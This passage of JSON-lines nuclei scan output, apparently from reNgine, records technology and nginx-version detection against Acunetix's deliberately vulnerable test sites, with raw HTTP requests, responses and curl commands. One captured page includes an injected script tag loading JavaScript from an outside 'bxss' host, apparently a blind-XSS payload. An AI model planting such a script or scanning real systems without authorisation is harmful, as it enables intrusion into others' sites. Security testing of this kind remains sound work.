close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:43.651385856Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/css\",\"path\":\"/static/css\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/css/\",\"request\":\"GET /static/css HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:43 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:44.000549115Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20' 'http://testhtml5.vulnweb.com/static/css'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"path\":\"/static/app/partials\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"request\":\"GET /static/app/partials HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:43 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:44.008935305Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/app/partials'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.34\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:44 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:44.571161156Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"angular\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:44.605777399Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:45 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:45.111815115Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 